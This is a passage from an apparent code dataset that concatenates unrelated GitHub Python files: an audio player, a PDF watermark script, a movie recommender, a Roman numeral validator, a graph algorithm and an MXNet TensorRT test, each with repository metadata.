log\n\t\t\t\t\t\tpatapvars.songLog.append(nowPlaying.path)\n\t\t\t\t\telse:\n\t\t\t\t\t\tnowPlaying.paused = None\n\t\telse:\n\t\t\tglobals.shouldRunB = True\n\t\tif (not pygame.mixer_music.get_busy()) and (nowPlaying.paused == None):\n\t\t\tif files:\n\t\t\t\tindex = -1\n\t\t\t\tif (type == \"playlist\"):\n\t\t\t\t\twhile True:\n\t\t\t\t\t\tif patapvars.options[\"shuffle\"]:\n\t\t\t\t\t\t\tindex = random.randint(0, len(files)-1)\n\t\t\t\t\t\tif nowPlaying.path != files[index].path: break\n\t\t\t\t\t\tif not patapvars.options[\"shuffle\"]: break\n\t\t\t\tpygame.mixer_music.load(files[index].path)\n\n\t\t\t\t#Change nowPlaying object\n\t\t\t\tnowPlaying.name = files[index].name\n\t\t\t\tnowPlaying.path = files[index].path\n\t\t\t\tnowPlaying.paused = False\n\t\t\t\tnowPlaying.length = files[index].length\n\t\t\t\tnowPlaying.positionOffset = files[index].positionOffset\n\t\t\t\tnowPlaying.logged = False\n\n\t\t\t\t#Add to log\n\t\t\t\tpatapvars.songLog.append(files[index].path)\n\n\t\t\t\tpygame.mixer_music.play()\n\t\t\t\tif (not patapvars.options[\"shuffle\"]) or (patapvars.options[\"shuffle\"] and not patapvars.options[\"shuffleIndefinitely\"]):\n\t\t\t\t\tfiles.pop(index)\n\t\t\t\tif (type == \"playlist\"):\n\t\t\t\t\tnowPlaying.playlist = PlaylistData()\n\t\t\t\t\tif (patapvars.options[\"shuffle\"]) and (patapvars.options[\"shuffleIndefinitely\"]):\n\t\t\t\t\t\tnowPlaying.playlist.files = []\n\t\t\t\t\t\tnowPlaying.playlist.shuffleIndefinitely = True\n\t\t\t\t\telse:\n\t\t\t\t\t\tnowPlaying.playlist.files = files\n\t\t\t\t\t\tnowPlaying.playlist.shuffleIndefinitely = False\n\t\t\t\telse:\n\t\t\t\t\tnowPlaying.playlist = None\n\t\t\telse:\n\t\t\t\tprint(\"{} ended! 
Start a new song or playlist?\".format(type.capitalize()))\n\n\t\t\t\t#Change nowPlaying object\n\t\t\t\tnowPlaying.name = None\n\t\t\t\tnowPlaying.path = None\n\t\t\t\tnowPlaying.paused = None\n\t\t\t\tnowPlaying.length = None\n\t\t\t\tnowPlaying.positionOffset = 0\n\t\t\t\tnowPlaying.playlist = None\n\t\t\t\tnowPlaying.logged = False\n\t\t\t\t\n\t\t\t\tsys.exit(0)\t\t#Exit thread","repo_name":"IsakTheHacker/AT-Audio-Player","sub_path":"Python AT Audio Player/patapfuncs.py","file_name":"patapfuncs.py","file_ext":"py","file_size_in_byte":3569,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"23290145706","text":"#! python3\r\n# Simple PDF overlaying script. The page numbers should be equal\r\n\r\nimport PyPDF2\r\nsimple_pdf = open('test2.pdf', 'rb')\r\nwatermark_pdf = open('watermark.pdf', 'rb')\r\n\r\nsimple_reader = PyPDF2.PdfFileReader(simple_pdf)\r\nwatermark_reader = PyPDF2.PdfFileReader(watermark_pdf)\r\n\r\npdf_writer = PyPDF2.PdfFileWriter()\r\n\r\nfor page_number in range(0, simple_reader.numPages): # define pages number\r\n page = simple_reader.getPage(page_number)\r\n page.mergePage(watermark_reader.getPage(page_number)) # define required page\r\n pdf_writer.addPage(page)\r\n\r\nresult_pdf = open('result.pdf', 'wb')\r\npdf_writer.write(result_pdf)\r\n\r\nwatermark_pdf.close()\r\nsimple_pdf.close()","repo_name":"mnakhaev/python-practice","sub_path":"automate_with_python/pdf_apps/pdf_watermark.py","file_name":"pdf_watermark.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72587929524","text":"import csv\r\n\r\nwith open(r\"C:\\Users\\hp\\Downloads\\Book1.csv\", newline='') as f: #change this file directory\r\n reader = csv.reader(f)\r\n data = list(reader)\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport difflib\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.metrics.pairwise import cosine_similarity\r\n\r\nmovies_data = pd.read_csv(r\"C:\\Users\\hp\\Downloads\\movies.csv\")\r\n\r\nselected_features = ['genres','keywords','tagline','cast','director']\r\n\r\nfor feature in selected_features:\r\n movies_data[feature] = movies_data[feature].fillna('')\r\n\r\ncombined_features = movies_data['genres']+' '+movies_data['keywords']+' '+movies_data['tagline']+' '+movies_data['cast']+' '+movies_data['director']\r\nvectorizer = TfidfVectorizer()\r\nfeature_vectors = vectorizer.fit_transform(combined_features)\r\nsimilarity = cosine_similarity(feature_vectors)\r\n\r\nist2=[]\r\nfor i in data:\r\n count=0\r\n ist=[]\r\n recommend=[]\r\n user_id=[]\r\n user_watched=[]\r\n for b in i:\r\n if count==0:\r\n print(\"user id:\",b)\r\n user_id=b\r\n ist.append(user_id)\r\n if count%2 != 0 and count != 0:\r\n movie_name=b\r\n user_watched.append(movie_name)\r\n \r\n if count%2 == 0 and count != 0:\r\n user_rating=b\r\n \r\n if user_rating == 'null':\r\n user_rating=5\r\n if int(user_rating) >= 3:\r\n movie_name = movie_name\r\n list_of_all_titles = movies_data['title'].tolist()\r\n find_close_match = difflib.get_close_matches(movie_name, list_of_all_titles)\r\n close_match = find_close_match[0]\r\n index_of_the_movie = movies_data[movies_data.title == close_match]['index'].values[0]\r\n similarity_score = list(enumerate(similarity[index_of_the_movie]))\r\n sorted_similar_movies = sorted(similarity_score, key = lambda x:x[1], reverse = True) \r\n i = 0\r\n for movie in sorted_similar_movies:\r\n 
index = movie[0]\r\n                title_from_index = movies_data[movies_data.index==index]['title'].values[0]\r\n                i+=1\r\n                if i>= 2:\r\n                    recommend.append(title_from_index)\r\n                if i==6:\r\n                    break\r\n\r\n            if int(user_rating) < 3:\r\n                movie_name = movie_name\r\n                list_of_all_titles = movies_data['title'].tolist()\r\n                find_close_match = difflib.get_close_matches(movie_name, list_of_all_titles)\r\n                close_match = find_close_match[0]\r\n                index_of_the_movie = movies_data[movies_data.title == close_match]['index'].values[0]\r\n                similarity_score = list(enumerate(similarity[index_of_the_movie]))\r\n                sorted_similar_movies = sorted(similarity_score, key = lambda x:x[1], reverse = True) \r\n                i = 0\r\n                for movie in sorted_similar_movies:\r\n                    index = movie[0]\r\n                    title_from_index = movies_data[movies_data.index==index]['title'].values[0]\r\n                    i+=1\r\n                    if i>= 2:\r\n                        if title_from_index in recommend:\r\n                            recommend.remove(title_from_index)\r\n                    if i==4:\r\n                        break\r\n            \r\n        count +=1\r\n\r\n    result = sorted(recommend, key = recommend.count, reverse = True)\r\n    res = [i for n, i in enumerate(result) if i not in result[:n]]\r\n    for i in res[:]:\r\n        if i in user_watched:\r\n            res.remove(i)\r\n    count3=0\r\n    for i in res:\r\n        if count3<6:\r\n            ist.append(i)\r\n            count3+=1\r\n\r\n    ist2.append(ist)\r\n\r\nprint(ist2)\r\n\r\nfields = ['User id', 'Recommended movies'] \r\n \r\n \r\n# name of csv file \r\nfilename = r\"C:\\Users\\hp\\Downloads\\Book2.csv\"\r\n\r\n# writing to csv file (newline='' avoids blank rows on Windows) \r\nwith open(filename, 'w', newline='') as csvfile: \r\n    # creating a csv writer object \r\n    csvwriter = csv.writer(csvfile) \r\n    \r\n    # writing the fields \r\n    csvwriter.writerow(fields) \r\n    \r\n    # writing the data rows \r\n    csvwriter.writerows(ist2)\r\n\r\n    \r\n\r\n\r\n\r\n    \r\n\r\n    \r\n\r\n","repo_name":"varadchaskar/Movie-Recommendation-System","sub_path":"csv import.py","file_name":"csv import.py","file_ext":"py","file_size_in_byte":4249,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"10418450044","text":"import csv\nimport time\nfrom operator import itemgetter\n\ndef user_input():\n    global user_country\n    user_country = input('Please select how many countries out of 156 you would like to compare (type EXIT to quit): ')\n    if user_country.lower() == 'exit':\n        quit()\n    else:\n        try:\n            if int(user_country) <= 0 or int(user_country) > numCountries:\n                print('Number is out of range')\n                return False\n        except ValueError:\n            print('Value you entered is not numeric!')\n            return False\n    return True\n\ndef comparison():\n    global user_compare\n    user_compare = int(input('Please choose the number of what you want to know or do:\\n'\n                             '1. Score\\n'\n                             '2. GDP per capita\\n'\n                             '3. Social support\\n'\n                             '4. Healthy life expectancy\\n'\n                             '5. Freedom to make life choices\\n'\n                             '6. Generosity\\n'\n                             '7. Perceptions of corruption\\n'\n                             '8. Choose another number of countries to compare\\n'\n                             '9. 
Quit program\\n'))\n    if user_compare == 9:\n        quit()\n    if user_compare == 8:\n        return False\n    return True\n\ndef Sort_values(j):\n    global datalist\n    print(f'{header[1]}, {header[j]}')\n    datalist = sorted(datalist, key=itemgetter(j), reverse=True)\n    i = 0\n    for data in datalist:\n        if i < int(user_country):\n            print(f'{datalist[i][1]}, {datalist[i][j]}')\n            i += 1\n    return\n\nwith open('2019.csv', 'r', encoding='UTF8') as csv_file:\n    csv_reader = csv.reader(csv_file)\n    datalist = []\n    header = next(csv_reader)\n    for line in csv_reader:\n        datalist.append(line)\n    numCountries = len(datalist)\n    while True:\n        while user_input() == True:\n            while comparison() == True:\n                if user_compare < 1 or user_compare > 9:\n                    print('Choice out of range')\n                    continue\n                Sort_values(user_compare + 1)\n                time.sleep(2.5)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Hanna2605/pythonProject","sub_path":"my_homework/homework_06/homework_06.py","file_name":"homework_06.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"1439654923","text":"from Direction import Direction\n\nclass Ship:\n    # all attributes are public for shorter code ( for now... )\n\n    def __init__(self, name, length, color, coord=None, direction=None):\n        assert(isinstance(name, str))\n        assert(int(color) > 0 and int(color) < 255)\n        \n        if coord is not None:\n            assert(len(coord) == 2)\n        \n        if direction is not None:\n            assert(isinstance(direction, Direction))\n        \n        self.name = name\n        self.length = length\n        self.coord = coord\n        self.direction = direction\n        self.color = color\n\n    def reset(self):\n        self.coord = None\n        self.direction = None\n\n    def __eq__(self, other):\n        if isinstance(other, Ship):\n            return (self.name == other.name and self.length == other.length \\\n                and self.coord == other.coord and self.direction == other.direction \\\n                and self.color == other.color )\n\n        return False\n\n    def is_placed(self):\n        # a ship counts as placed once both a coordinate and a direction are set\n        return self.coord is not None and self.direction is not None\n\n    def __str__(self):\n        s = \"Ship name: \" + self.name + '\\n'\n        s += \"Ship color: \" + str(self.color) + '\\n'\n        s += \"Ship length: \" + str(self.length) + '\\n'\n\n        if self.coord is not None: \n            s += \"Ship coord: \" + str(self.coord) + '\\n'\n            s += \"Ship orientation: \" + self.direction.value\n        else:\n            s += \"Ship coord: None\\n\"\n            s += \"Ship orientation: None\\n\"\n\n        return s\n","repo_name":"shetsecure/3i005","sub_path":"battelship_game_proba/src/Ship.py","file_name":"Ship.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"17512698131","text":"import csv\r\nfrom math import asin, cos, sqrt, radians\r\nimport webbrowser\r\nimport numpy as np\r\nimport geopandas as gpd\r\nimport folium\r\nfrom scipy.sparse.csgraph import shortest_path\r\nfrom scipy.sparse import csr_matrix\r\nimport sys\r\n\r\norigin = [38.98691761313879, -76.94256431247602] # (0, 0)\r\n\r\n\r\ndef read_csv_data(file_path):\r\n    data = np.genfromtxt(file_path, delimiter=',')\r\n    return data\r\n\r\n\r\nedges = read_csv_data('edges.csv')\r\nrows = edges[:, 0]\r\ncols = edges[:, 1]\r\ndata = edges[:, 2]\r\nmax_id = int(np.max(edges[:, :2]))\r\nadjacency_matrix = csr_matrix((data, (rows, cols)), shape=(max_id + 1, max_id + 1))\r\n\r\n# To find the shortest path between all nodes\r\ndist_matrix, predecessors = shortest_path(csgraph=adjacency_matrix, directed=False, return_predecessors=True)\r\n\r\n\r\ndef 
plot_all_data_on_map(file_path):\r\n data = read_csv_data(file_path)\r\n\r\n # Create a GeoDataFrame from the data\r\n gdf = gpd.GeoDataFrame(\r\n {'id': range(len(data))},\r\n geometry=gpd.points_from_xy(data[:, 1], data[:, 0]), # Swapped longitude and latitude\r\n crs=\"EPSG:4326\" # this is the coordinate system for GPS\r\n )\r\n\r\n # Create a folium map centered at the mean of the coordinates\r\n m = folium.Map(location=[data[:, 0].mean(), data[:, 1].mean()], zoom_start=13) # Swapped longitude and latitude\r\n\r\n # Add all points to the map\r\n for _, row in gdf.iterrows():\r\n folium.CircleMarker(\r\n location=[row.geometry.y, row.geometry.x],\r\n radius=2,\r\n color='red',\r\n fill=True,\r\n fill_color='red',\r\n fill_opacity=0.9\r\n ).add_to(m)\r\n\r\n # Draw all edges between the nodes\r\n draw_edges_on_map(m, gdf, edges)\r\n\r\n return m\r\n\r\n\r\ndef draw_edges_on_map(m, gdf, edges):\r\n for edge in edges:\r\n start_node = gdf.loc[int(edge[0]), 'geometry']\r\n end_node = gdf.loc[int(edge[1]), 'geometry']\r\n folium.PolyLine([(start_node.y, start_node.x), (end_node.y, end_node.x)], color='black').add_to(m)\r\n\r\n\r\n# Function to construct path from predecessors matrix\r\ndef construct_path(start, end, predecessors):\r\n path = []\r\n i = end\r\n while i != start:\r\n path.append(i)\r\n i = predecessors[start, i]\r\n path.append(start)\r\n path.reverse()\r\n return path\r\n\r\n\r\n# calculates distance between two sets of longitude and latitude\r\ndef distance(lat1, lon1, lat2, lon2):\r\n # approximate radius of Earth in km\r\n R = 6371.0\r\n\r\n lat1_rad = radians(lat1)\r\n lon1_rad = radians(lon1)\r\n lat2_rad = radians(lat2)\r\n lon2_rad = radians(lon2)\r\n\r\n # haversine formula to calculate distance\r\n hav = 0.5 - cos(lat2_rad - lat1_rad) / 2 + cos(lat1_rad) * cos(lat2_rad) * (1 - cos(lon2_rad - lon1_rad)) / 2\r\n return (2 * R) * asin(sqrt(hav))\r\n\r\n\r\n# uses distance function to find nearest pair of longitude and latitude in a given file to a given pair\r\ndef nearest(csv_file, given_lat, given_lon):\r\n nearest_dist = float('inf') # set to infinity\r\n nearest_lat = None\r\n nearest_lon = None\r\n\r\n with open(csv_file, 'r') as f:\r\n reader = csv.reader(f)\r\n for row in reader:\r\n file_lat = float(row[0])\r\n file_lon = float(row[1])\r\n\r\n dist = distance(float(given_lat), float(given_lon), file_lat, file_lon)\r\n\r\n if dist < nearest_dist:\r\n nearest_dist = dist\r\n nearest_lat = file_lat\r\n nearest_lon = file_lon\r\n\r\n return nearest_lat, nearest_lon\r\n\r\n\r\n# convert from coordinates to indices\r\ndef convert_coord(lat, lon, csv_file):\r\n with open(csv_file, 'r') as f:\r\n reader = csv.reader(f)\r\n count = 0\r\n for row in reader:\r\n # new nodes file as them switched\r\n if lat == float(row[0]) and lon == float(row[1]):\r\n return count\r\n else:\r\n count = count + 1\r\n\r\n\r\ndef draw_route_from_coordinates(start_coords, end_coords, map_all, edges_file='edges.csv', nodes_file='nodes.csv'):\r\n # Convert from coordinates to indices\r\n start_index = convert_coord(*nearest(nodes_file, *start_coords), nodes_file)\r\n end_index = convert_coord(*nearest(nodes_file, *end_coords), nodes_file)\r\n\r\n # Plot optimal route between two nodes\r\n draw_optimal_route(nodes_file, start_index, end_index, map_all, predecessors)\r\n map_all.save('my_map.html')\r\n webbrowser.open('my_map.html', new=2)\r\n\r\n\r\ndef draw_optimal_route(file_path, start, end, m, predecessors):\r\n # Check if there is a path between start and end\r\n if predecessors[start, 
end] == -9999:\r\n print(f\"No path exists between node {start} and node {end}.\")\r\n sys.exit();\r\n\r\n data = read_csv_data(file_path)\r\n\r\n # Construct the path\r\n path = construct_path(start, end, predecessors)\r\n\r\n print(f\"The computed path is: {path}\")\r\n\r\n # Create a GeoDataFrame from the data of nodes in the path\r\n gdf = gpd.GeoDataFrame(\r\n {'id': path},\r\n geometry=gpd.points_from_xy(data[path, 1], data[path, 0]), # Swapped longitude and latitude\r\n crs=\"EPSG:4326\" # this is the coordinate system for GPS\r\n )\r\n\r\n # Add the points in the path to the map\r\n for _, row in gdf.iterrows():\r\n folium.CircleMarker(\r\n location=[row.geometry.y, row.geometry.x],\r\n radius=3, # Adjust as needed\r\n color='blue',\r\n fill=True,\r\n fill_color='blue',\r\n fill_opacity=0.6 # Adjust as needed\r\n ).add_to(m)\r\n\r\n # Add the lines in the path to the map\r\n for i in range(len(path) - 1):\r\n start_node = gdf.iloc[i]['geometry']\r\n end_node = gdf.iloc[i + 1]['geometry']\r\n folium.PolyLine([(start_node.y, start_node.x), (end_node.y, end_node.x)], color='green').add_to(m)\r\n\r\n\r\nstart_coords = [sys.argv[1], sys.argv[2]]\r\nend_coords = [sys.argv[3], sys.argv[4]]\r\n\r\n# Plot all data points\r\nmap_all = plot_all_data_on_map('nodes.csv')\r\ndraw_route_from_coordinates(start_coords, end_coords, map_all)\r\n\r\n","repo_name":"hraza10/FIRE199","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71924293366","text":"import json\nimport click\n\n\ndef error(msg):\n click.secho(msg, fg=\"red\")\n\n\ndef get_resource(name, call, paginate=False, start=0, end=0):\n if start and start > end:\n error(\"Start index cannot be larger than the end index\")\n return\n click.secho(f\"{name}:\", fg=\"green\")\n data = call()\n if paginate:\n if end <=0:\n data = data[start: ]\n else:\n data = data[start:end+1]\n click.echo(json.dumps(data, indent=2))\n","repo_name":"andrmantz/Noobcash","sub_path":"cli/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"25175599046","text":"from django.urls import path, include\nfrom rest_framework.routers import DefaultRouter\nfrom tracker import views\n\n# Create a router and register our viewsets with it.\nrouter = DefaultRouter()\n\n# The API URLs are now determined automatically by the router.\nurlpatterns = [\n path('auth', views.TrackerAuthorizeView.as_view()), # /auth\n path('refresh', views.TrackerRefreshView.as_view()), # /refresh\n path('delete', views.TrackerDeleteView.as_view()), # /delete\n path('', include(router.urls)),\n]","repo_name":"SYSC-4907-Group-51/backend","sub_path":"tracker/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5350511491","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# The Romans represented numbers using the numerals ``I``, ``V``, ``X``, ``L``, ``C``, ``D``, and ``M``. These numerals represent the following numbers:\n# \n# |Roman Numeral\t|Hindu-Arabic Equivalent|\n# |:---|:---|\n# |I\t|1|\n# |V\t|5|\n# |X\t|10|\n# |L\t|50|\n# |C\t|100|\n# |D\t|500|\n# |M\t|1000|\n# \n# \n# For a number written in Roman numerals to be considered valid there are basic rules which must be followed. \n# 1. 
Repeating a numeral up to three times represents addition of the number. For example, III represents 1 + 1 + 1 = 3. \n# 2. Only I, X, C, and M can be repeated; V, L, and D cannot be, and there is no need to do so.\n# 3. Writing numerals that decrease from left to right represents addition of the numbers. For example, LX represents 50 + 10 = 60 and XVI represents 10 + 5 + 1 = 16.\n# 4. To write a number that otherwise would take repeating of a numeral four or more times, there is a subtraction rule. \n# 5. Writing a smaller numeral to the left of a larger numeral represents subtraction. For example, IV represents 5 - 1 = 4 and IX represents 10 - 1 = 9. To avoid ambiguity, the only pairs of numerals that use this subtraction rule are\n# \n# |Roman Numeral\t|Hindu-Arabic Equivalent|\n# |:---------------|:-----------------------|\n# |IV\t|4 = 5 - 1|\n# |IX\t|9 = 10 - 1|\n# |XL\t|40 = 50 - 10|\n# |XC\t|90 = 100 - 10|\n# |CD\t|400 = 500 - 100|\n# |CM\t|900 = 1000 - 100|\n# \n# Even though the rules allow some numbers to be expressed in more than one way there is always a \"best\" way of writing a particular number.\n# \n# For example, it would appear that there are at least six ways of writing the number sixteen:\n# ```\n# IIIIIIIIIIIIIIII\n# VIIIIIIIIIII\n# VVIIIIII\n# XIIIIII\n# VVVI\n# XVI\n# ```\n# However, according to the rules, only ``XIIIIII`` and ``XVI`` are valid, and the last example is considered to be the most efficient, as it uses the least number of numerals.\n# \n# In this project, you will read a roman numeral from the user. First, you need to check if the number if in a valid form according to the rules posted above. Then convert it to the minimal representation. It's essential to modularize your code, and you are free to use either for or while loop. You are not allowed to use any of the Python structures that are not taught so far. \n\n# In[1]:\n\n\ndef ValidRoman(roman_num):\n \"\"\"Validating if the strings entered are correct\"\"\"\n \n # Converting the letters to upper case (if any small letters are preset)\n global roman\n roman = roman_num.upper()\n print('The Roman Numeral entered is:',roman_num)\n \n # Separating the letters\n ind_ch = list(roman)\n \n # Creating an array of valid roman numerals to be considered \n valid = ['I', 'V', 'X', 'L', 'C', 'D', 'M']\n \n for character in ind_ch: \n if character not in valid:\n print('Error! 
Please enter the displayed characters only.')\r\n            return False\r\n    return True\r\n\r\ndef Repeat(roman):\r\n    \"\"\"This function checks if any character other than I, X, C and M is repeated\"\"\"\r\n    \r\n    ind_ch = list(roman)\r\n    \r\n    for letter in ind_ch:\r\n        if letter not in repeat and roman.count(letter)>1: \r\n            return False\r\n    return True\r\n\r\ndef DescRule(roman):\r\n    \"\"\"This function will check if the characters are in descending order, with a few exceptions\"\"\"\r\n    \r\n    ind_ch = list(roman)\r\n    \r\n    list_temp = []\r\n    \r\n    invalidFlag = False\r\n    c = 0\r\n    while c < len(ind_ch):\r\n        #print('for c:',c)\r\n        #print(roman[c:c+2])\r\n        while roman[c:c+2] in combo:\r\n            #print('while c:',c)\r\n            if len(list_temp) == 0 or list_temp[-1] >= combo[roman[c:c+2]]:\r\n                list_temp.append(combo[roman[c:c+2]])\r\n                c = c + 2\r\n            else:\r\n                print('Invalid')\r\n                invalidFlag = True\r\n                return False\r\n            #print('List_temp:',list_temp)\r\n            #print('c:',c)\r\n            if c == len(ind_ch):\r\n                break\r\n        \r\n        #print('Last ele:',list_temp[-1])\r\n        #print('Char:', ind_ch[c])\r\n        #print('Value of char:',value[ind_ch[c]])\r\n        if c == len(ind_ch):\r\n            break\r\n        \r\n        if len(list_temp) == 0 or list_temp[-1] >= value[ind_ch[c]]:\r\n            list_temp.append(value[ind_ch[c]])\r\n        else:\r\n            return False\r\n        c+=1\r\n\r\n    return True\r\n\r\ndef Rules(roman):\r\n    \"\"\"This function validates the specified rules for the Roman Numeral to be valid\"\"\"\r\n    \r\n    ind_ch = list(roman)\r\n    \r\n    global sum_roman\r\n    \r\n    sum_roman = 0\r\n    ch = 0\r\n    while ch < len(ind_ch):\r\n        \r\n        count = 1\r\n        \r\n        \r\n        while roman[ch:ch+2] in combo:\r\n            sum_roman = sum_roman + combo[roman[ch:ch+2]]\r\n            ch = ch + 2\r\n        \r\n        \r\n        if ch == len(ind_ch):\r\n            break\r\n        \r\n        while ch < len(ind_ch)-1 and ind_ch[ch] == ind_ch[ch+1]:\r\n            count +=1\r\n            ch += 1\r\n        \r\n        #if count % 3 == 0:\r\n            #sum_roman = sum_roman + value[ind_ch[ch]] * count\r\n        #else:\r\n        if count <=9:\r\n            sum_roman = sum_roman + value[ind_ch[ch]] * count\r\n        else:\r\n            print('Error!')\r\n            return False\r\n        \r\n        if ch == len(ind_ch)-1:\r\n            break\r\n        \r\n        ch += 1\r\n    print('Sum:',sum_roman)\r\n    return sum_roman\r\n    \r\ndef RomanRep(sum_roman):\r\n    \"\"\"This function will return the minimal/official representation of the number\"\"\"\r\n    b = 0\r\n    roman_rep = \"\"\r\n    \r\n    roman_values = ['M', 'CM', 'D', 'CD', 'C', 'XC', 'L', 'XL', 'X', 'IX', 'V', 'IV','I']\r\n    integer_values = [1000, 900, 500, 400, 100, 90, 50, 40, 10, 9, 5, 4, 1] \r\n    \r\n    while sum_roman > 0:\r\n        if sum_roman >= integer_values[b]:\r\n            sum_roman = sum_roman - integer_values[b]\r\n            roman_rep += roman_values[b]\r\n        else:\r\n            b = b + 1\r\n\r\n    print('The minimal representation is:', roman_rep)\r\n    return roman_rep\r\n\r\n\r\ns = False\r\n\r\nrepeat = ['I','X','C','M']\r\n\r\nvalue = {'I':1, 'V':5, 'X': 10, 'L':50, 'C': 100, 'D': 500, 'M':1000}\r\n\r\ncombo = {'IV': 4, 'IX':9, 'XL': 40, 'XC': 90, 'CD': 400, 'CM': 900}\r\n\r\nwhile not s:\r\n    roman_num = input('Enter the Roman Numerals between I,V,X,L,C,D,M:')\r\n    if roman_num.isnumeric():\r\n        print('Error! 
The input has numeric characters!')\r\n        continue\r\n    s = ValidRoman(roman_num)\r\n    if s == False:\r\n        continue\r\n    s = Repeat(roman)\r\n    if s == False:\r\n        print('Error! Only characters I, X, C and M can be repeated.')\r\n        continue\r\n    s = DescRule(roman)\r\n    if s == False:\r\n        continue\r\n    s = Rules(roman)\r\n    if s == False:\r\n        continue\r\n    s = RomanRep(sum_roman) \r\n\r\n\r\n# In[ ]:\r\n\r\n\r\n\r\n\r\n","repo_name":"Rakeshb95/Python---Roman-Numerals","sub_path":"Project 4_RXB180039.py","file_name":"Project 4_RXB180039.py","file_ext":"py","file_size_in_byte":6705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"13908090202","text":"import tensorflow as tf\nimport numpy as np\n\nclass networkData():\n    '''\n    Data structure for hand Keypoints & segmentation network\n    '''\n    def __init__(self, image, label, kps2D, kps3D, imageID, h, w, outType, dsName,\n                 topLeft = None,\n                 bottomRight = None,\n                 extraScale=None, camMat = None):\n        if label is not None:\n            if label.shape.ndims == 2:\n                label = tf.expand_dims(label, 2)\n            elif label.shape.ndims == 3 and label.shape.dims[2] == 1:\n                pass\n            else:\n                raise ValueError('Input label shape must be [height, width], or '\n                                 '[height, width, 1].')\n\n        if label is not None:\n            label.set_shape([None, None, 1])\n\n        if kps2D is not None:\n            kps2D = tf.reshape(kps2D,[-1, 3])\n        if kps3D is not None:\n            kps3D = tf.reshape(kps3D, [-1, 3])\n\n\n        self.image = image\n        self.label = label\n        self.kps2D = kps2D\n        self.kps3D = kps3D\n        self.imageID = imageID\n        self.width = w\n        self.height = h\n        self.outputType = outType\n        self.datasetName = dsName\n\n        self.topLeft = topLeft\n        self.bottomRight = bottomRight\n        self.extraScale = extraScale\n        self.camMat = camMat","repo_name":"shreyashampali/HOnnotate","sub_path":"onlineAug/commonAug.py","file_name":"commonAug.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","stars":146,"dataset":"github-code","pt":"76"} +{"seq_id":"7783646008","text":"class Solution:\n    def findRedundantDirectedConnection(self, edges):\n        can1 = None\n        can2 = None\n        parent = [i for i in range(len(edges) + 1)]\n        for i, edge in enumerate(edges):\n            p, c = edge\n            c_p = parent[c]\n            if c_p != c:\n                can1 = [p, c]\n                can2 = [c_p, c]\n                edges[i][0] = 0\n                break\n            else:\n                parent[c] = p\n        parent = [i for i in range(len(edges) + 1)]\n        for edge in edges:\n            p, c = edge\n            p_p = self.findParent(parent, p)\n            c_p = self.findParent(parent, c)\n            if p_p == c_p:\n                if can2 is not None:\n                    return can2\n                else:\n                    return edge\n            parent[c_p] = p_p\n        return can1\n\n\n    def findParent(self, parent, cur):\n        if cur != parent[cur]:\n            parent[cur] = self.findParent(parent, parent[cur])\n        return parent[cur]\n","repo_name":"qtsean/Leetcode","sub_path":"RedundantConnection.py","file_name":"RedundantConnection.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"45567907873","text":"import mxnet as mx\nfrom common import *\n\n\ndef detect_cycle_from(sym, visited, stack):\n    visited.add(sym.handle.value)\n    stack.add(sym.handle.value)\n    for s in sym.get_children():\n        if s.handle.value not in visited:\n            if detect_cycle_from(s, visited, stack):  # recurse into the child, not the parent\n                return True\n        elif s.handle.value in stack:\n            return True\n    stack.remove(sym.handle.value)\n    return False\n\n\ndef has_no_cycle(sym):\n    visited = set()\n    stack = set()\n    all_nodes = sym.get_internals()\n    for s in all_nodes:\n        if s.handle.value not in visited:\n            if detect_cycle_from(s, visited, stack):\n                return False\n    
return True\n\n\ndef test_simple_cycle():\n inp = mx.sym.Variable('input', shape=[1,10])\n A = mx.sym.FullyConnected(data=inp, num_hidden=10, no_bias=False, name='A')\n B = mx.sym.FullyConnected(data=A, num_hidden=10, no_bias=False, name='B')\n D = mx.sym.sin(data=A, name='D')\n C = mx.sym.elemwise_add(lhs=B, rhs=D, name='C')\n arg_params = {\n 'I_weight': mx.nd.zeros([10,10]),\n 'I_bias': mx.nd.zeros([10]),\n 'A_weight': mx.nd.zeros([10,10]),\n 'A_bias': mx.nd.zeros([10]),\n 'B_weight': mx.nd.zeros([10,10]),\n 'B_bias': mx.nd.zeros([10]),\n }\n\n executor = C.simple_bind(ctx=mx.gpu(0), data=(1,10), softmax_label=(1,),\n shared_buffer=arg_params, grad_req='null', force_rebind=True)\n optimized_graph = mx.contrib.tensorrt.get_optimized_symbol(executor)\n assert has_no_cycle(optimized_graph), \"The graph optimized by TRT contains a cycle\"\n\n\nif __name__ == '__main__':\n import nose\n nose.runmodule()\n","repo_name":"researchmm/tasn","sub_path":"tasn-mxnet/tests/python/tensorrt/test_cycle.py","file_name":"test_cycle.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","stars":216,"dataset":"github-code","pt":"76"} +{"seq_id":"42431790339","text":"from bddrest import status, given, when\n\nfrom accesshandler.models import Rule\nfrom accesshandler.cache import redisconnection, keystr\nfrom .helpers import 